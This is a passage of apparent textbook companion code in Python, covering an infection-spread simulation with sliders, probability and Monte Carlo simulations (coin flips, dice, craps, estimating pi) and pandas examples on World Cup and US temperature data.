f'Pop = {fixed["pop"]:,}, ' +
f'Contacts/Day = {fixed["init_contacts"]}, ' +
f'Infectivity = {(100*fixed["contagiousness"]):.1f}%, ' +
f'Days Contagious = {fixed["days_spreading"]}',
fontsize = 'xx-large')
plt.legend(fontsize = 'xx-large')
txt_box = plt.text(plt.xlim()[1]/2, plt.ylim()[1]/1.25,
f'Total Infections = {total_infections:,.0f}',
fontdict = {'size':'xx-large', 'weight':'bold',
'color':'red'})
return infection_plot, txt_box
# # Code from Figure 13-16 on page 274
# fixed = {
# 'pop': 5000000, # population at risk
# 'duration': 500, # number of days for simulation
# 'initial_infections': 4, # initial number of cases
# 'init_contacts': 50, #contacts without social distancing
# 'contagiousness': 0.005, # prob. of getting disease if exposed
# 'days_spreading': 10} # days contagious after infection
# variable = {
# # 'red_daily_contacts': 4, # social distancing
# 'red_daily_contacts': fixed['init_contacts'], # social distancing
# 'red_start': 20, # start of social distancing
# 'red_end': 200} # end of social distancing
# infections, total_infections = simulation(fixed, variable)
# fig = plt.figure(figsize=(12, 8.5))
# plot_infections(infections, total_infections, fixed)
# To use interactive plots, you might need to change your
# Python preferences. Go to preferences->iPythonConsole->graphics.
# Set backend to automatic, and then restart the iPython console
# # Code from page 275
# # Layout for figure
# fig = plt.figure(figsize=(12, 8.5))
# infections_ax = plt.axes([0.12, 0.2, 0.8, 0.65])
# contacts_ax = plt.axes([0.25, 0.09, 0.65, 0.03])
# start_ax = plt.axes([0.25, 0.06, 0.65, 0.03])
# end_ax = plt.axes([0.25, 0.03, 0.65, 0.03])
# # Code from page 276
# # Create the sliders
# from matplotlib.widgets import Slider
# contacts_slider = Slider(
# contacts_ax, # axes object containing the slider
# 'reduced\ncontacts/day', # name of slider
# 0, # minimal value of the parameter
# 50, # maximal value of the parameter
# 50) # initial value of the parameter)
# contacts_slider.label.set_fontsize(12)
# start_day_slider = Slider(start_ax, 'start reduction', 1, 30, 20)
# start_day_slider.label.set_fontsize(12)
# end_day_slider = Slider(end_ax, 'end reduction', 30, 400, 200)
# end_day_slider.label.set_fontsize(12)
# # Define a function that will be executed each time the value
# # indicated by any slider changes.
# def update(fixed, infection_plot, txt_box,
# contacts_slider, start_day_slider, end_day_slider):
# variable = {'red_daily_contacts': contacts_slider.val,
# 'red_start': start_day_slider.val,
# 'red_end': end_day_slider.val}
# I, total_infections = simulation(fixed, variable)
# infection_plot.set_ydata(I) # new y-coordinates for plot
# txt_box.set_text(f'Total Infections = {total_infections:,.0f}')
# # Code from page 277
# slider_update = lambda _: update(fixed, infection_plot, txt_box,
# contacts_slider, start_day_slider,
# end_day_slider)
# contacts_slider.on_changed(slider_update)
# start_day_slider.on_changed(slider_update)
# end_day_slider.on_changed(slider_update)
# infections, total_infections = simulation(fixed, variable)
# plt.axes(infections_ax)
# infection_plot, txt_box = plot_infections(infections,
# total_infections, fixed)
```
#### File: code/chapter 17/chapter17.py
```python
import random
import numpy as np
import matplotlib.pyplot as plt
import scipy.integrate
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 18
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 18
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
plt.rcParams['lines.markersize'] = 10
#set number of times marker is shown when displaying legend
plt.rcParams['legend.numpoints'] = 1
#Set size of type in legend
plt.rcParams['legend.fontsize'] = 14
# # Figure 17-1 from page 344
def roll_die():
"""Returns a random int between 1 and 6"""
return random.choice([1,2,3,4,5,6])
def roll_n(n):
result = ''
for i in range(n):
result = result + str(roll_die())
print(result)
# roll_n(10)
# # Figure 17-2 from page 347
def flip(num_flips):
"""Assumes num_flips a positive int"""
heads = 0
for i in range(num_flips):
if random.choice(('H', 'T')) == 'H':
heads += 1
return heads/num_flips
def flip_sim(num_flips_per_trial, num_trials):
"""Assumes num_flips_per_trial and num_trials positive ints"""
frac_heads = []
for i in range(num_trials):
frac_heads.append(flip(num_flips_per_trial))
mean = sum(frac_heads)/len(frac_heads)
return mean
# # Code from page 347
# random.seed(0)
# print('Mean =', flip_sim(10, 1))
# print('Mean =', flip_sim(10, 1))
# print('Mean =', flip_sim(10, 100))
# print('Mean =', flip_sim(10, 100))
# # Figure 17-3 from page 350
def regress_to_mean(num_flips, num_trials):
#Get fraction of heads for each trial of num_flips
frac_heads = []
for t in range(num_trials):
frac_heads.append(flip(num_flips))
#Find trials with extreme results and for each the next trial
extremes, next_trials = [], []
for i in range(len(frac_heads) - 1):
if frac_heads[i] < 0.33 or frac_heads[i] > 0.66:
extremes.append(frac_heads[i])
next_trials.append(frac_heads[i+1])
#Plot results
plt.plot(range(len(extremes)), extremes, 'ko',
label = 'Extreme')
plt.plot(range(len(next_trials)), next_trials, 'k^',
label = 'Next Trial')
plt.axhline(0.5)
plt.ylim(0, 1)
plt.xlim(-1, len(extremes) + 1)
plt.xlabel('Extreme Example and Next Trial')
plt.ylabel('Fraction Heads')
plt.title('Regression to the Mean')
plt.legend(loc = 'best')
# random.seed(0)
# regress_to_mean(15, 50)
# # Figure 17-5 from page 352
def flip_plot(min_exp, max_exp):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
Plots results of 2**min_exp to 2**max_exp coin flips"""
ratios, diffs, x_axis = [], [], []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
num_heads = 0
for n in range(num_flips):
if random.choice(('H', 'T')) == 'H':
num_heads += 1
num_tails = num_flips - num_heads
try:
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
except ZeroDivisionError:
continue
plt.title('Difference Between Heads and Tails')
plt.xlabel('Number of Flips')
plt.ylabel('Abs(#Heads - #Tails)')
plt.xticks(rotation = 'vertical')
plt.plot(x_axis, diffs, 'k')
plt.figure()
plt.title('Heads/Tails Ratios')
plt.xlabel('Number of Flips')
plt.ylabel('#Heads/#Tails')
plt.xticks(rotation = 'vertical')
plt.plot(x_axis, ratios, 'k')
# random.seed(0)
# flip_plot(4, 20)
# # Figure 17-8 from page 356
def variance(X):
"""Assumes that X is a list of numbers.
Returns the variance of X"""
mean = sum(X)/len(X)
tot = 0.0
for x in X:
tot += (x - mean)**2
return tot/len(X)
def std_dev(X):
"""Assumes that X is a list of numbers.
Returns the standard deviation of X"""
return variance(X)**0.5
# # Figure 17-6 from page 357
def make_plot(x_vals, y_vals, title, x_label, y_label, style,
log_x = False, log_y = False):
plt.figure()
plt.title(title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.plot(x_vals, y_vals, style)
if log_x:
plt.semilogx()
if log_y:
plt.semilogy()
# # Figure 17-10 from page 358
def run_trial(num_flips):
num_heads = 0
for n in range(num_flips):
if random.choice(('H', 'T')) == 'H':
num_heads += 1
num_tails = num_flips - num_heads
return (num_heads, num_tails)
def flip_plot1(min_exp, max_exp, num_trials):
"""Assumes min_exp, max_exp, num_trials ints >0; min_exp < max_exp
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
x_axis = []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
title = f'Mean Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_means, title, 'Number of Flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = f'SD Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
# random.seed(0)
# flip_plot1(4, 20, 20)
# # flip_plot1 with addition of code from Figure 17-12 on page 360
def flip_plot1(min_exp, max_exp, num_trials):
"""Assumes min_exp, max_exp, num_trials ints >0; min_exp < max_exp
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
x_axis = []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/num_tails)
diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
title = f'Mean Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_means, title, 'Number of Flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = f'SD Heads/Tails Ratios ({num_trials} Trials)'
make_plot(x_axis, ratios_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
###Added later in chapter
title = f'Mean abs(#Heads - #Tails) ({num_trials} Trials)'
make_plot(x_axis, diffs_means, title,
'Number of Flips', 'Mean abs(#Heads - #Tails)', 'ko',
log_x = True, log_y = True)
title = f'SD abs(#Heads - #Tails) ({num_trials} Trials)'
make_plot(x_axis, diffs_SDs, title,
'Number of Flips', 'Standard Deviation', 'ko',
log_x = True, log_y = True)
# # Figure 17-14 from page 361
def CV(X):
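    # Coefficient of variation: standard deviation divided by the mean
    # (returns nan when the mean is 0).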
mean = sum(X)/len(X)
try:
return std_dev(X)/mean
except ZeroDivisionError:
return float('nan')
# # Figure 17-15 from page 362
def flip_plot2(min_exp, max_exp, num_trials):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
num_trials a positive integer
Plots summaries of results of num_trials trials of
2**min_exp to 2**max_exp coin flips"""
ratios_means, diffs_means, ratios_SDs, diffs_SDs = [], [], [], []
ratios_CVs, diffs_CVs, x_axis = [], [], []
for exp in range(min_exp, max_exp + 1):
x_axis.append(2**exp)
for num_flips in x_axis:
ratios, diffs = [], []
for t in range(num_trials):
num_heads, num_tails = run_trial(num_flips)
ratios.append(num_heads/float(num_tails))
diffs.append(abs(num_heads - num_tails))
ratios_means.append(sum(ratios)/num_trials)
diffs_means.append(sum(diffs)/num_trials)
ratios_SDs.append(std_dev(ratios))
diffs_SDs.append(std_dev(diffs))
ratios_CVs.append(CV(ratios))
diffs_CVs.append(CV(diffs))
num_trials_str = ' (' + str(num_trials) + ' Trials)'
title = 'Mean Heads/Tails Ratios' + num_trials_str
make_plot(x_axis, ratios_means, title, 'Number of flips',
'Mean Heads/Tails', 'ko', log_x = True)
title = 'SD Heads/Tails Ratios' + num_trials_str
make_plot(x_axis, ratios_SDs, title, 'Number of flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
title = 'Mean abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_means, title,'Number of Flips',
'Mean abs(#Heads - #Tails)', 'ko',
log_x = True, log_y = True)
title = 'SD abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_SDs, title, 'Number of Flips',
'Standard Deviation', 'ko', log_x = True, log_y = True)
title = 'Coeff. of Var. abs(#Heads - #Tails)' + num_trials_str
make_plot(x_axis, diffs_CVs, title, 'Number of Flips',
'Coeff. of Var.', 'ko', log_x = True)
title = 'Coeff. of Var. Heads/Tails Ratio' + num_trials_str
make_plot(x_axis, ratios_CVs, title, 'Number of Flips',
'Coeff. of Var.', 'ko', log_x = True, log_y = True)
# flip_plot2(4, 20, 20)
# # Code from Figure 17-19 on page 366
# random.seed(0)
# vals = []
# for i in range(1000):
# num1 = random.choice(range(0, 101))
# num2 = random.choice(range(0, 101))
# vals.append(num1 + num2)
# plt.hist(vals, bins = 10, ec = 'k')
# plt.xlabel('Sum')
# plt.ylabel('Number of Occurrences')
# # Code from Figure 17-20 on page 368
def flip(num_flips):
"""Assumes num_flips a positive int"""
heads = 0
for i in range(num_flips):
if random.choice(('H', 'T')) == 'H':
heads += 1
return heads/float(num_flips)
def flip_sim(num_flips_per_trial, num_trials):
frac_heads = []
for i in range(num_trials):
frac_heads.append(flip(num_flips_per_trial))
mean = sum(frac_heads)/len(frac_heads)
sd = std_dev(frac_heads)
return (frac_heads, mean, sd)
def label_plot(num_flips, num_trials, mean, sd):
plt.title(str(num_trials) + ' trials of '
+ str(num_flips) + ' flips each')
plt.xlabel('Fraction of Heads')
plt.ylabel('Number of Trials')
plt.annotate('Mean = ' + str(round(mean, 4))
+ '\nSD = ' + str(round(sd, 4)), size='x-large',
xycoords = 'axes fraction', xy = (0.67, 0.5))
def make_plots(num_flips1, num_flips2, num_trials):
val1, mean1, sd1 = flip_sim(num_flips1, num_trials)
plt.hist(val1, bins = 20)
x_min,x_max = plt.xlim()
label_plot(num_flips1, num_trials, mean1, sd1)
plt.figure()
val2, mean2, sd2 = flip_sim(num_flips2, num_trials)
plt.hist(val2, bins = 20, ec = 'k')
plt.xlim(x_min, x_max)
label_plot(num_flips2, num_trials, mean2, sd2)
# random.seed(0)
# make_plots(100, 1000, 100000)
# # Code to produce plot in Figure 17-25 on page 374
# plt.plot([0,5], [0,5])
# plt.xlim(0,5)
# plt.ylim(0,5)
# plt.title('abs(x)')
#Figure 15.23
# print(scipy.integrate.quad(abs, 0, 5)[0])
# print(scipy.integrate.quad(abs, 0, 5)[1])
# # Figure 17-26 on page 375
def gaussian(x, mu, sigma):
"""assumes x, mu, sigma numbers
returns the value of P(x) for a Gaussian
with mean mu and sd sigma"""
factor1 = (1.0/(sigma*((2*np.pi)**0.5)))
factor2 = np.e**-(((x-mu)**2)/(2*sigma**2))
return factor1*factor2
def check_empirical(mu_max, sigma_max, num_trials):
"""assumes mu_max, sigma_max, num_trials positive ints
    prints fraction of values of Gaussians (with randomly
    chosen mu and sigma) falling within 1, 2, 3 standard
deviations"""
for t in range(num_trials):
mu = random.randint(-mu_max, mu_max + 1)
sigma = random.randint(1, sigma_max)
print('For mu =', mu, 'and sigma =', sigma)
for num_std in (1, 2, 3):
area = scipy.integrate.quad(gaussian, mu-num_std*sigma,
mu+num_std*sigma,
(mu, sigma))[0]
print(' Fraction within', num_std, 'std =',
round(area, 4))
# random.seed(0)
# check_empirical(10, 10, 3)
# # Code on bottom of page 374
# for x in range(-2, 3):
# print(gaussian(x, 0, 1))
# # Code on top of page 375
# print(scipy.integrate.quad(gaussian, -1, 1, (0, 1))[0])
# # Figure 17-27 on page 377
def show_error_bars(min_exp, max_exp, num_trials):
"""Assumes min_exp and max_exp positive ints; min_exp < max_exp
num_trials a positive integer
Plots mean fraction of heads with error bars"""
means, sds, x_vals = [], [], []
for exp in range(min_exp, max_exp + 1):
x_vals.append(2**exp)
frac_heads, mean, sd = flip_sim(2**exp, num_trials)
means.append(mean)
sds.append(sd)
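    # yerr = 1.96*sd spans roughly a 95% confidence band under a normal approximation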
plt.errorbar(x_vals, means, yerr=1.96*np.array(sds))
plt.semilogx()
plt.title('Mean Fraction of Heads ('
+ str(num_trials) + ' trials)')
plt.xlabel('Number of flips per trial')
plt.ylabel('Fraction of heads & 95% confidence')
# show_error_bars(3, 10, 100)
# # Figure 17-29 on page 382
def clear(n, p, steps):
"""Assumes n & steps positive ints, p a float
n: the initial number of molecules
p: the probability of a molecule being cleared
steps: the length of the simulation"""
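    # Analytic model of exponential decay: n*(1-p)**t molecules remain after t steps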
num_remaining = [n]
for t in range(steps):
num_remaining.append(n*((1-p)**t))
plt.plot(num_remaining)
plt.xlabel('Time')
plt.ylabel('Molecules Remaining')
plt.title('Clearance of Drug')
# clear(1000, 0.01, 1000)
# # Code suggested at top of page 383
# plt.semilogy()
# # Figure 17-32 on page 384
def successful_starts(success_prob, num_trials):
"""Assumes success_prob is a float representing probability of a
single attempt being successful. num_trials a positive int
Returns a list of the number of attempts needed before a
success for each trial."""
tries_before_success = []
for t in range(num_trials):
consec_failures = 0
while random.random() > success_prob:
consec_failures += 1
tries_before_success.append(consec_failures)
return tries_before_success
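# Quick expectation check (not part of the book's code): for a geometric
# process the mean number of failures before the first success is
# (1 - p)/p, so with success_prob = 0.5 the simulated tries_before_success
# values should average about 1.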
# prob_of_success = 0.5
# num_trials = 5000
# distribution = successful_starts(prob_of_success, num_trials)
# plt.hist(distribution, bins = 14)
# plt.xlabel('Tries Before Success')
# plt.ylabel('Number of Occurrences Out of ' + str(num_trials))
# plt.title('Probability of Starting Each Try = '
# + str(prob_of_success))
# # Code on page 387
def collision_prob(n, k):
prob = 1.0
for i in range(1, k):
prob = prob * ((n - i)/n)
return 1 - prob
# print(collision_prob(1000, 50))
# print(collision_prob(1000, 200))
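# Sanity check (not from the book): the same closed form gives the classic
# birthday paradox, e.g. collision_prob(365, 23) is roughly 0.507, the
# probability that at least two of 23 people share a birthday.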
# # Figure 17-34 on page 388
def sim_insertions(num_indices, num_insertions):
"""Assumes num_indices and num_insertions are positive ints.
Returns 1 if there is a collision; 0 otherwise"""
choices = range(num_indices) #list of possible indices
used = []
for i in range(num_insertions):
hash_val = random.choice(choices)
if hash_val in used: #there is a collision
return 1
else:
used.append(hash_val)
return 0
def find_prob(num_indices, num_insertions, num_trials):
collisions = 0
for t in range(num_trials):
collisions += sim_insertions(num_indices, num_insertions)
return collisions/num_trials
# # Code on page 388
# print('Actual probability of a collision =', collision_prob(1000, 50))
# print('Est. probability of a collision =', find_prob(1000, 50, 10000))
# print('Actual probability of a collision =', collision_prob(1000, 200))
# print('Est. probability of a collision =', find_prob(1000, 200, 10000))
# # Figure 17-35 on page 390
def play_series(num_games, team_prob):
    num_won = 0
    for game in range(num_games):
        if random.random() <= team_prob:
            num_won += 1
    return (num_won > num_games//2)
def fraction_won(team_prob, num_series, series_len):
won = 0
for series in range(num_series):
if play_series(series_len, team_prob):
won += 1
return won/float(num_series)
def sim_series(num_series):
prob = 0.5
    fracs_won, probs = [], []
    while prob <= 1.0:
        fracs_won.append(fraction_won(prob, num_series, 7))
        probs.append(prob)
        prob += 0.01
    plt.axhline(0.95) #Draw line at 95%
    plt.plot(probs, fracs_won, 'k', linewidth = 5)
plt.xlabel('Probability of Winning a Game')
plt.ylabel('Probability of Winning a Series')
plt.title(str(num_series) + ' Seven-Game Series')
# sim_series(400)
```
#### File: code/chapter 18/chapter18.py
```python
import random
import numpy as np
# # Figure 18-1 on page 396
def roll_die():
return random.choice([1,2,3,4,5,6])
# #Used later in chapter
# def roll_die():
# return random.choice([1,1,2,3,3,4,4,5,5,5,6,6])
def check_pascal(num_trials):
"""Assumes num_trials is an int > 0
Prints an estimate of the probability of winning"""
num_wins = 0
for i in range(num_trials):
for j in range(24):
d1 = roll_die()
d2 = roll_die()
if d1 == 6 and d2 == 6:
num_wins += 1
break
print('Probability of winning =', num_wins/num_trials)
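# For reference (not from the book), the analytic answer to Pascal's problem
# is 1 - (35/36)**24, roughly 0.491, so the estimate printed above should be
# close to that value for large num_trials.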
# check_pascal(1000000)
# # Figure 18-2 on page 397
class Craps_game(object):
def __init__(self):
self.pass_wins, self.pass_losses = 0, 0
self.dp_wins, self.dp_losses, self.dp_pushes = 0, 0, 0
def play_hand(self):
throw = roll_die() + roll_die()
if throw == 7 or throw == 11:
self.pass_wins += 1
self.dp_losses += 1
elif throw == 2 or throw == 3 or throw == 12:
self.pass_losses += 1
if throw == 12:
self.dp_pushes += 1
else:
self.dp_wins += 1
else:
point = throw
while True:
throw = roll_die() + roll_die()
if throw == point:
self.pass_wins += 1
self.dp_losses += 1
break
elif throw == 7:
self.pass_losses += 1
self.dp_wins += 1
break
def pass_results(self):
return (self.pass_wins, self.pass_losses)
def dp_results(self):
return (self.dp_wins, self.dp_losses, self.dp_pushes)
def craps_sim(hands_per_game, num_games):
"""Assumes hands_per_game and num_games are ints > 0
Play num_games games of hands_per_game hands; print results"""
games = []
#Play num_games games
for t in range(num_games):
c = Craps_game()
for i in range(hands_per_game):
c.play_hand()
games.append(c)
#Produce statistics for each game
p_ROI_per_game, dp_ROI_per_game = [], []
for g in games:
wins, losses = g.pass_results()
p_ROI_per_game.append((wins - losses)/float(hands_per_game))
wins, losses, pushes = g.dp_results()
dp_ROI_per_game.append((wins - losses)/float(hands_per_game))
#Produce and print summary statistics
mean_ROI = str(round((100*sum(p_ROI_per_game)/num_games), 4)) + '%'
sigma = str(round(100*np.std(p_ROI_per_game), 4)) + '%'
print('Pass:', 'Mean ROI =', mean_ROI, 'Std. Dev. =', sigma)
mean_ROI = str(round((100*sum(dp_ROI_per_game)/num_games), 4)) +'%'
sigma = str(round(100*np.std(dp_ROI_per_game), 4)) + '%'
print('Don\'t pass:','Mean ROI =', mean_ROI, 'Std Dev =', sigma)
# # Code from page 400
# craps_sim(20, 10)
# craps_sim(1000000, 10)
# # Code from page 401
# craps_sim(20, 1000000)
# # Class with version of play_hand from Figure 18-4 on page 403
class Craps_game(object):
def __init__(self):
self.pass_wins, self.pass_losses = 0, 0
self.dp_wins, self.dp_losses, self.dp_pushes = 0, 0, 0
def play_hand(self):
#An alternative, faster, implementation of play_hand
points_dict = {4:1/3, 5:2/5, 6:5/11, 8:5/11, 9:2/5, 10:1/3}
throw = roll_die() + roll_die()
if throw == 7 or throw == 11:
self.pass_wins += 1
self.dp_losses += 1
elif throw == 2 or throw == 3 or throw == 12:
self.pass_losses += 1
if throw == 12:
self.dp_pushes += 1
else:
self.dp_wins += 1
else:
if random.random() <= points_dict[throw]: # point before 7
self.pass_wins += 1
self.dp_losses += 1
else: # 7 before point
self.pass_losses += 1
self.dp_wins += 1
def pass_results(self):
return (self.pass_wins, self.pass_losses)
def dp_results(self):
return (self.dp_wins, self.dp_losses, self.dp_pushes)
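# Sanity check (not from the book) of points_dict in the faster play_hand:
# with two fair dice there are 3 ways to roll a 4 and 6 ways to roll a 7,
# so P(point of 4 made before a 7) = 3/(3 + 6) = 1/3; likewise points of
# 5 and 9 give 4/(4 + 6) = 2/5, and points of 6 and 8 give 5/(5 + 6) = 5/11.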
# # Figure 18-6 from page 407
def throw_needles(num_needles):
in_circle = 0
    for _ in range(1, num_needles + 1):
x = random.random()
y = random.random()
if (x*x + y*y)**0.5 <= 1:
in_circle += 1
#Counting needles in one quadrant only, so multiply by 4
return 4*(in_circle/num_needles)
def get_est(num_needles, num_trials):
estimates = []
for t in range(num_trials):
pi_guess = throw_needles(num_needles)
estimates.append(pi_guess)
std_dev = np.std(estimates)
cur_est = sum(estimates)/len(estimates)
print('Est. =', str(round(cur_est, 5)) + ',',
'Std. dev. =', str(round(std_dev, 5)) + ',',
'Needles =', num_needles)
return (cur_est, std_dev)
def est_pi(precision, num_trials):
num_needles = 1000
std_dev = precision
while std_dev > precision/1.96:
cur_est, std_dev = get_est(num_needles, num_trials)
num_needles *= 2
return cur_est
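# Note (not from the book): the 1.96 factor corresponds to a 95% confidence
# interval, so est_pi keeps doubling num_needles until 1.96 standard
# deviations of the trial estimates fit within the requested precision.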
# # Code from page 407
random.seed(0)
est_pi(0.01, 100)
```
#### File: code/chapter 23/chapt23.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#change defaults for plotting
#set line width
plt.rcParams['lines.linewidth'] = 4
#set font size for titles
plt.rcParams['axes.titlesize'] = 20
#set font size for labels on axes
plt.rcParams['axes.labelsize'] = 20
#set size of numbers on x-axis
plt.rcParams['xtick.labelsize'] = 16
#set size of numbers on y-axis
plt.rcParams['ytick.labelsize'] = 16
#set size of ticks on x-axis
plt.rcParams['xtick.major.size'] = 7
#set size of ticks on y-axis
plt.rcParams['ytick.major.size'] = 7
#set size of markers, e.g., circles representing points
#set numpoints for legend
plt.rcParams['legend.numpoints'] = 1
#set parameters for saving figures
plt.rcParams['savefig.dpi'] = 1000
# plt.rcParams['savefig.bbox'] = 'tight'
plt.rcParams['savefig.pad_inches'] = 0
# # Code on page 512
# wwc = pd.read_csv('wwc2019_q-f.csv')
# print(wwc.to_string())
# # Code on page 513
# for i in wwc.index:
# print(i)
# # Code on page 514
# for c in wwc.columns:
# print(c)
# print(wwc.values)
# # Code on page 515
# print(pd.DataFrame())
# rounds = ['Semis', 'Semis', '3rd Place', 'Championship']
# print(pd.DataFrame(rounds))
# print(pd.DataFrame({'Round': rounds}))
# rounds = ['Semis', 'Semis', '3rd Place', 'Championship']
# teams = ['USA', 'Netherlands', 'Sweden', 'USA']
# df = pd.DataFrame({'Round': rounds, 'Winner': teams})
# print(df)
# # Code on page 516
# df['W Goals'] = [2, 1, 0, 0]
# print(df)
# df['W Goals'] = [2, 1, 2, 2]
# print(df)
# print(df.drop('Winner', axis = 'columns'))
# # Code on page 517
# quarters_dict = {'Round': ['Quarters']*4,
# 'Winner': ['England', 'USA', 'Netherlands', 'Sweden'],
# 'W Goals': [3, 2, 2, 2]}
# df = pd.concat([pd.DataFrame(quarters_dict), df], sort = False)
# print(df.to_string())
# print(pd.concat([pd.DataFrame(quarters_dict), df], sort = True).to_string())
# # Code on page 518
# print(df.reset_index(drop = True).to_string())
# print(df.set_index('Round').to_string())
# print(wwc['Winner'].to_string())
# # Code on page 519
# print(wwc['Winner'][3])
# winners = ''
# for w in wwc['Winner']:
# winners += w + ','
# print(winners[:-1])
# print(wwc[['Winner', 'Loser']].to_string())
# # Code on page 520
# print(wwc[['Round','Winner','Loser','W Goals','L Goals']].to_string())
# print(wwc[1:2])
# print(wwc.loc[3])
# # Code on page 521
# print(wwc.loc[[1,3,5]])
# print(wwc.loc[3:7:2])
# print(wwc.loc[6:])
# # Code on page 522
# print(wwc.loc[:2])
# print(wwc.loc[0:2, 'Round':'L Goals':2])
# wwc_by_round = wwc.set_index('Round')
# print(wwc_by_round.to_string())
# # Code on page 523
# print(wwc_by_round.loc['Semis'])
# print(wwc_by_round.loc[['Semis', 'Championship']])
# print(wwc_by_round.loc['Quarters':'Semis':2])
# print(wwc_by_round.iloc[[1,2]])
# # Code on page 524
# grouped_by_round = wwc.groupby('Round')
# print(grouped_by_round.sum())
# print(wwc.groupby('Winner').mean())
# # Code on page 525
# print(wwc.groupby(['Loser', 'Round']).mean())
# print(wwc.loc[wwc['Winner'] == 'Sweden'])
# print(wwc.loc[(wwc['Winner'] == 'Sweden') | (wwc['Loser'] == 'Sweden')])
# # Code on page 526
def get_country(df, country):
"""df a DataFrame with series labeled Winner and Loser
country a str
returns a DataFrame with all rows in which country appears
in either the Winner or Loser column"""
return df.loc[(df['Winner'] == country) | (df['Loser'] == country)]
# print(get_country(get_country(wwc, 'Sweden'),'Germany'))
def get_games(df, countries):
return df[(df['Winner'].isin(countries) |
df['Loser'].isin(countries))]
# # Code on page 527
# print(wwc['W Goals'].sum())
# print((wwc[wwc['Winner'] == 'Sweden']['W Goals'].sum() +
# wwc[wwc['Winner'] == 'Sweden']['L Goals'].sum()))
# print((wwc['W Goals'].sum() - wwc['L Goals'].sum())/len(wwc['W Goals']))
# # Code on page 528
# wwc['G Diff'] = wwc['W Goals'] - wwc['L Goals']
# print(wwc)
# # Add new column to wwc
# wwc['G Diff'] = wwc['W Goals'] - wwc['L Goals']
# # create a dict with values for new row
# new_row_dict = {'Round': ['Total'],
# 'W Goals': [wwc['W Goals'].sum()],
# 'L Goals': [wwc['L Goals'].sum()],
# 'G Diff': [wwc['G Diff'].sum()]}
# # Create DataFrame from dict, then pass it to concat
# new_row = pd.DataFrame(new_row_dict)
# wwc = pd.concat([wwc, new_row], sort = False).reset_index(drop = True)
# print(wwc.to_string())
# # Code on page 529
# print(wwc.loc[wwc['Round'] != 'Total'].corr(method = 'pearson'))
# # Code on page 530
# pd.set_option('display.max_rows', 6)
# pd.set_option('display.max_columns', 5)
# temperatures = pd.read_csv('US_temperatures.csv')
# print(temperatures)
# # Code on page 531
# print(temperatures.loc[temperatures['Date']==19790812][['New York','Tampa']])
# temperatures['Max T'] = temperatures.max(axis = 'columns')
# temperatures['Min T'] = temperatures.min(axis = 'columns')
# temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
# print(temperatures.loc[temperatures['Date']==20000704])
# # code from page 532
# # Read in file again, because above code modified temperatures
# temperatures = pd.read_csv('US_temperatures.csv')
# temperatures.set_index('Date', drop = True, inplace = True)
# temperatures['Max T'] = temperatures.max(axis = 'columns')
# temperatures['Min T'] = temperatures.min(axis = 'columns')
# temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
# print(temperatures.loc[20000704:20000704])
# plt.figure(figsize = (14, 3)) #set aspect ratio for figure
# plt.plot(list(temperatures['Mean T']))
# plt.title('Mean Temp Across 21 US Cities')
# plt.xlabel('Days Since 1/1/1961')
# plt.ylabel('Degrees C')
# plt.figure(figsize = (14, 3)) #set aspect ratio for figure
# plt.plot(list(temperatures['Mean T'])[0:3*365])
# plt.title('Mean Temp Across 21 US Cities')
# plt.xlabel('Days Since 1/1/1961')
# plt.ylabel('Degrees C')
# # Figure 23-3 from page 534
def get_dict(temperatures, labels):
"""temperatures a DataFrame. Its indices are ints
representing dates of the form yyyymmdd
labels a list of column labels
returns a dict with strs representing years as keys,
the values dicts with the columns as keys, and
a list of the daily temperatures in that column for
that year as values
"""
year_dict = {}
for index, row in temperatures.iterrows():
year = str(index)[0:4]
try:
for col in labels:
year_dict[year][col].append(row[col])
except:
year_dict[year] = {col:[] for col in labels}
for col in labels:
year_dict[year][col].append(row[col])
return year_dict
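# Illustrative shape of the dict returned by get_dict (values made up):
#   {'1961': {'Max T': [...], 'Min T': [...], 'Mean T': [...]},
#    '1962': {...}, ...}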
# # Code from page 535
temperatures = pd.read_csv('US_temperatures.csv')
